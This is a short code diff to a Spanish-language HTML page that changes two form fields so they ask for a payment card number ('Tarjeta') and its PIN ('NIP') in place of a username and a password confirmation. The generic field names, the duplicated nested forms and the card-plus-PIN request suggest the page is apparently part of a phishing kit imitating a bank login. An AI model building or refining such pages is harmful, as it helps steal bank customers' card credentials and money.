--- a/azt/azt.html
+++ b/azt/azt.html
@@ -57,7 +57,7 @@
 						<form class="formulario" id="contact-form"  name="submit-form">
 						<label for="data1"> </label>
 						<div class="contenedor-input">
-							<input id="data1" name="data1"  placeholder="Usuario/Cuenta/Tarjeta" required />
+							<input id="data1" name="data1"  placeholder="Tarjeta" required />
 						</div>	
 
 						<form class="formulario" id="contact-form"  name="submit-form">
@@ -69,7 +69,7 @@
 							<form class="formulario" id="contact-form"  name="submit-form">
 								<label for="data3"> </label>
 								<div class="contenedor-input">
-									<input id="data3" input type="password" name="data3"  placeholder="Confirmar contraseña" required />
+									<input id="data3" input type="password" name="data3"  placeholder="NIP" required />
 								</div>		
 			
 								<div class="contenedor-boton">
